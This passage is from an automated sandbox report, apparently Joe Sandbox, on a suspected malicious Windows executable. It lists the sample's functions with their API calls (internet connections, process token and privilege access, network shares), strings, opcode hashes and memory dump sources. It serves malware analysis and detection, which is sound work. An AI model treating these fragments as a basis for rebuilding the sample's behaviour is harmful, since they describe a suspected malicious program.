                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                    • String ID:
                                                    • API String ID: 1592001646-0
                                                    • Opcode ID: 3c5456a5a6650bda7af8d11d9df33fe8b663f2a655eb5ea347ae2406a5625c24
                                                    • Instruction ID: 5b2578f6d6ea0bd9873488c84b2ec6fa857c5cbeb34f2f1a21705e19cf682d6a
                                                    • Opcode Fuzzy Hash: 3c5456a5a6650bda7af8d11d9df33fe8b663f2a655eb5ea347ae2406a5625c24
                                                    • Instruction Fuzzy Hash: C221AE31E01108EFEB00EFA4CA48BEEB7BAEF56304F148059E404AB240DB30AE05CF90
                                                    APIs
                                                    • __setmode.LIBCMT ref: 006709AE
                                                      • Part of subcall function 00655A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006B7896,?,?,00000000), ref: 00655A2C
                                                      • Part of subcall function 00655A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006B7896,?,?,00000000,?,?), ref: 00655A50
                                                    • _fprintf.LIBCMT ref: 006709E5
                                                    • OutputDebugStringW.KERNEL32(?), ref: 006A5DBB
                                                      • Part of subcall function 00674AAA: _flsall.LIBCMT ref: 00674AC3
                                                    • __setmode.LIBCMT ref: 00670A1A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                    • String ID:
                                                    • API String ID: 521402451-0
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006C17A3
                                                      • Part of subcall function 006C182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006C184C
                                                      • Part of subcall function 006C182D: InternetCloseHandle.WININET(00000000), ref: 006C18E9
                                                    Similarity
                                                    • API ID: Internet$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 1463438336-0
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,006DFAC0), ref: 006B3A64
                                                    • GetLastError.KERNEL32 ref: 006B3A73
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 006B3A82
                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,006DFAC0), ref: 006B3ADF
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 2267087916-0
                                                    APIs
                                                    • _free.LIBCMT ref: 00685101
                                                      • Part of subcall function 0067571C: __FF_MSGBANNER.LIBCMT ref: 00675733
                                                      • Part of subcall function 0067571C: __NMSG_WRITE.LIBCMT ref: 0067573A
                                                      • Part of subcall function 0067571C: RtlAllocateHeap.NTDLL(00E00000,00000000,00000001,00000000,?,?,?,00670DD3,?), ref: 0067575F
                                                    Similarity
                                                    • API ID: AllocateHeap_free
                                                    • String ID:
                                                    • API String ID: 614378929-0
                                                    APIs
                                                    • _memset.LIBCMT ref: 006544CF
                                                      • Part of subcall function 0065407C: _memset.LIBCMT ref: 006540FC
                                                      • Part of subcall function 0065407C: _wcscpy.LIBCMT ref: 00654150
                                                      • Part of subcall function 0065407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00654160
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00654524
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00654533
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0068D4B9
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                    • String ID:
                                                    • API String ID: 1378193009-0
                                                    APIs
                                                      • Part of subcall function 00655A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006B7896,?,?,00000000), ref: 00655A2C
                                                      • Part of subcall function 00655A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006B7896,?,?,00000000,?,?), ref: 00655A50
                                                    • gethostbyname.WSOCK32(?,?,?), ref: 006C6399
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C63A4
                                                    • _memmove.LIBCMT ref: 006C63D1
                                                    • inet_ntoa.WSOCK32(?), ref: 006C63DC
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 1504782959-0
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 006A8B61
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006A8B73
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006A8B89
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006A8BA4
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 006512D8
                                                    • GetClientRect.USER32(?,?), ref: 0068B5FB
                                                    • GetCursorPos.USER32(?), ref: 0068B605
                                                    • ScreenToClient.USER32(?,?), ref: 0068B610
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006AD84D
                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006AD864
                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006AD879
                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 006AD897
                                                    Similarity
                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                    • String ID:
                                                    • API String ID: 1352324309-0
                                                    APIs
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 006DB2E4
                                                    • ScreenToClient.USER32(?,?), ref: 006DB2FC
                                                    • ScreenToClient.USER32(?,?), ref: 006DB320
                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 006DB33B
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?), ref: 006B6BE6
                                                      • Part of subcall function 006B76C4: _memset.LIBCMT ref: 006B76F9
                                                    • _memmove.LIBCMT ref: 006B6C09
                                                    • _memset.LIBCMT ref: 006B6C16
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 006B6C26
                                                    Similarity
                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                    • String ID:
                                                    • API String ID: 48991266-0
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 00652231
                                                    • SetTextColor.GDI32(?,000000FF), ref: 0065223B
                                                    • SetBkMode.GDI32(?,00000001), ref: 00652250
                                                    • GetStockObject.GDI32(00000005), ref: 00652258
                                                    • GetWindowDC.USER32(?,00000000), ref: 0068BE83
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0068BE90
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0068BEA9
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0068BEC2
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0068BEE2
                                                    • ReleaseDC.USER32(?,00000000), ref: 0068BEED
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    • Opcode ID: 65fa6a35ae7df839a73deaa68a61c10618bd2a7c5460177ae4469d7adaf8d92e
                                                    • Instruction ID: 0cacf318defbb3ca9dd49dffca884cfb9e69c84dff4a5d066eb3790375e327a4
                                                    • Opcode Fuzzy Hash: 65fa6a35ae7df839a73deaa68a61c10618bd2a7c5460177ae4469d7adaf8d92e
                                                    • Instruction Fuzzy Hash: 7EE06D32904244EADF215FA4FC0D7D83F12EB16332F049367FA6A480E187724A80DB12
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 006A871B
                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,006A82E6), ref: 006A8722
                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006A82E6), ref: 006A872F
                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,006A82E6), ref: 006A8736
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CurrentOpenProcessThreadToken
                                                    • String ID:
                                                    • API String ID: 3974789173-0
                                                    • Opcode ID: 48977ee24e0aa0abcb950b3206cef81fa57cf1b2f38535598b4e836bafc43513
                                                    • Instruction ID: 704c3c6c6ddcc0fe1ca5ee8d7f3aa38038161189fe63dc18f39595e3ffb27af5
                                                    • Opcode Fuzzy Hash: 48977ee24e0aa0abcb950b3206cef81fa57cf1b2f38535598b4e836bafc43513
                                                    • Instruction Fuzzy Hash: 3FE08636A122119FD7206FF05D0CF9A3BAEEF51791F158829B246CB040DA348841CB50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %n
                                                    • API String ID: 0-2798127140
                                                    • Opcode ID: 3f3079128ef0a9ac03c8453b6f30077027a69abaa415d914acf7f269a1e9c11b
                                                    • Instruction ID: 8f2166cfbaeac666c364d9ad125e4ec9b4097ce360e1c0d4bcf9383a84e0298b
                                                    • Opcode Fuzzy Hash: 3f3079128ef0a9ac03c8453b6f30077027a69abaa415d914acf7f269a1e9c11b
                                                    • Instruction Fuzzy Hash: BAB1A2718001099BCF14EF94C8959FEB7B7EF48312F90412AFD52A7291DB349E8ACB95
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __itow_s
                                                    • String ID: xbq$xbq
                                                    • API String ID: 3653519197-3323883282
                                                    • Opcode ID: 382ab5b9514f217f9c0aaad43ad53bd1a14ee68d8a4e4f8432c50ec5f1eed3d4
                                                    • Instruction ID: dab38f72d9dfa754fec3002d925b0bc6f5719c734dd2708321571af4842dad04
                                                    • Opcode Fuzzy Hash: 382ab5b9514f217f9c0aaad43ad53bd1a14ee68d8a4e4f8432c50ec5f1eed3d4
                                                    • Instruction Fuzzy Hash: 9AB15B70A00209AFCB14DF58C891EFABBBAFF58300F14815DF9459B291EB70E985CB64
                                                    APIs
                                                      • Part of subcall function 0066FC86: _wcscpy.LIBCMT ref: 0066FCA9
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • __wcsnicmp.LIBCMT ref: 006BB02D
                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 006BB0F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                    • String ID: LPT
                                                    • API String ID: 3222508074-1350329615
                                                    • Opcode ID: f8e4fce916e9294226640773e78e594031bd1fe42407e72eb6f65dbab3cc3925
                                                    • Instruction ID: 11a1d78a8d9f3d63ab9c95b5df5c9bc20cc6560f26926b7a9b816be6cd909a64
                                                    • Opcode Fuzzy Hash: f8e4fce916e9294226640773e78e594031bd1fe42407e72eb6f65dbab3cc3925
                                                    • Instruction Fuzzy Hash: E96161B5A00215EFCB14EF98C891EEEB7B6EF08310F144169F916AB351D770AE85CB54
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00662968
                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00662981
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: 5a1a675fb864ef9abad951d64e68ae2839599ac798ef317aaf3b6acabba1c442
                                                    • Instruction ID: 7e67e50fbbbaa7e2fb3c91b2f7c61c4db71aded928806624632d36f999bd4092
                                                    • Opcode Fuzzy Hash: 5a1a675fb864ef9abad951d64e68ae2839599ac798ef317aaf3b6acabba1c442
                                                    • Instruction Fuzzy Hash: 0B5154724087449BD360EF10D886BABBBE9FB85341F41895DF6D8410A1DF70852CCB6A
                                                    APIs
                                                      • Part of subcall function 00654F0B: __fread_nolock.LIBCMT ref: 00654F29
                                                    • _wcscmp.LIBCMT ref: 006B9824
                                                    • _wcscmp.LIBCMT ref: 006B9837
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$__fread_nolock
                                                    • String ID: FILE
                                                    • API String ID: 4029003684-3121273764
                                                    • Opcode ID: 0a19119a1fed1079bf444a1d72fd90c62c0e46b2d8455e2d03c49b563e6ae8b2
                                                    • Instruction ID: 5cac761f734bcfe490e5fbf2ed35f660e5282257fe318b07cca9db2f12446ef4
                                                    • Opcode Fuzzy Hash: 0a19119a1fed1079bf444a1d72fd90c62c0e46b2d8455e2d03c49b563e6ae8b2
                                                    • Instruction Fuzzy Hash: 5C41F971A00209BADF209FA4CC85FEFBBBEDF85714F00046DFA05A7281DA7199458B65
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID: Ddq$Ddq
                                                    • API String ID: 1473721057-78641243
                                                    • Opcode ID: a3822f194a97426978fe6a68592d022db5d295d78e30e4af01782664bbccbef9
                                                    • Instruction ID: 91dca9cefc2a7fb074d30001f7960b6ea4b00305d3c031fd1814540a78a4eba2
                                                    • Opcode Fuzzy Hash: a3822f194a97426978fe6a68592d022db5d295d78e30e4af01782664bbccbef9
                                                    • Instruction Fuzzy Hash: F65122786083418FDB60CF58C580A6ABBF2BB88355F54891CEC858B361D331EC89CF82
                                                    APIs
                                                    • _memset.LIBCMT ref: 006C259E
                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006C25D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_memset
                                                    • String ID: |
                                                    • API String ID: 1413715105-2343686810
                                                    • Opcode ID: 1cd57ad2e86fbbcc60311ef3f8a90119b56d056462c3efa2cac143998925a7ba
                                                    • Instruction ID: f1843b0e527a7a7bd8dfcaa425fe67457c835235b9305bc2cf1d127192cd8ad7
                                                    • Opcode Fuzzy Hash: 1cd57ad2e86fbbcc60311ef3f8a90119b56d056462c3efa2cac143998925a7ba
                                                    • Instruction Fuzzy Hash: 3B31397180011AABCF41EFA5DC95EEEBFBAFF08300F10005AFD15A6162DA315A16DB64
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?), ref: 006D6B17
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 006D6B53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    • Opcode ID: 893dc44a9a6d98c6662f42cf628992fcd771764703a35e43623bf5c875d2846f
                                                    • Instruction ID: ce9fe75af415744abe92918ec620bb2634f9237ff1e91ff02a21fdc1fd05ba3d
                                                    • Opcode Fuzzy Hash: 893dc44a9a6d98c6662f42cf628992fcd771764703a35e43623bf5c875d2846f
                                                    • Instruction Fuzzy Hash: A131AC71600204AEDB109F28CC80AFB77AAFF48760F10961AF9A5D7290DA31AC91CB64
                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 006A9965
                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 006A999F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: @U=u
                                                    • API String ID: 3850602802-2594219639
                                                    • Opcode ID: 010b8bdc97a31201b0698ce98d6657cdb177da1d11815b8c2eba93ba53a43854
                                                    • Instruction ID: 2343d02ce3600e2b8d1bae90849bb1cccb991bce43891a3e393e8385ec619d75
                                                    • Opcode Fuzzy Hash: 010b8bdc97a31201b0698ce98d6657cdb177da1d11815b8c2eba93ba53a43854
                                                    • Instruction Fuzzy Hash: F121C571D00205ABCB10BBA4D881DEEB77BEF89711F15406EFE15A7290EA709D458B70
                                                    APIs
                                                    • _memset.LIBCMT ref: 006B2911
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006B294C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: c0aee85748171f6cbcd0da94986fff6a8be89e56e4b541ba99f9f068de6c4ab1
                                                    • Instruction ID: 8a72643aec5b70e07cf2a190c23dda17d93e1e43df7a6983daa7ba7d24be03ac
                                                    • Opcode Fuzzy Hash: c0aee85748171f6cbcd0da94986fff6a8be89e56e4b541ba99f9f068de6c4ab1
                                                    • Instruction Fuzzy Hash: 3131F7B1900307DFEB24EF49C845BEEBBF6EF45350F144019E989A62A1D77099C5CB51
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                      • Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC
                                                    • GetParent.USER32(?), ref: 0068B7BA
                                                    • DefDlgProcW.USER32(?,00000133,?,?,?,?,?,?,?,?,006519B3,?,?,?,00000006,?), ref: 0068B834
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$ParentProc
                                                    • String ID: hW
                                                    • API String ID: 2181805148-1300829777
                                                    • Opcode ID: faba56383e5d0dbd4ad20460e194219f5063ea5da07d40d2d5ed524f9a51b208
                                                    • Instruction ID: 7ab786e0fe181ed3188f698019e495ee85e6483b5a3874a558369053ceae6d6c
                                                    • Opcode Fuzzy Hash: faba56383e5d0dbd4ad20460e194219f5063ea5da07d40d2d5ed524f9a51b208
                                                    • Instruction Fuzzy Hash: 72219E34201504AFCB249B2CC885EE93BA7AF4E321F584264F9255F3F2C7319E56DB50
                                                    APIs
                                                      • Part of subcall function 0066603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00666051
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006AAA10
                                                    • _strlen.LIBCMT ref: 006AAA1B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
